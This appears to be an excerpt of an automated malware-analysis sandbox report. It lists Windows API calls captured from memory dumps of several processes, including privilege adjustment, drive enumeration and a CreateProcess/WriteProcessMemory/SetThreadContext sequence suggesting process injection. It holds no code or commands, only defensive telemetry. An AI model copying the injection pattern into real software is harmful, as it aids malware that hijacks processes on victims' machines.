                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0209AA71
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0209A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0209A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124992374.0000000002830000.00000040.00000040.sdmp, Offset: 02830000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2136981702.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124992374.0000000002830000.00000040.00000040.sdmp, Offset: 02830000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121163971.0000000002092000.00000040.00000001.sdmp, Offset: 02092000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121163971.0000000002092000.00000040.00000001.sdmp, Offset: 02092000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D3AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D3AD37
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D3B329
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D3B329
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D3A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D3A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D3BB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D3AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 01D3AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D3BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D3AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01D3AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01D3ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D3BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D3A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D3BB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D3A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01D3ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01D3AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01D3A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01D3A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121945996.0000000001D32000.00000040.00000001.sdmp, Offset: 01D32000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121945996.0000000001D32000.00000040.00000001.sdmp, Offset: 01D32000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19CA
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19CA
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002D4A96
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002D4A96
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002D4068
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002D4068
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002D38BE
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
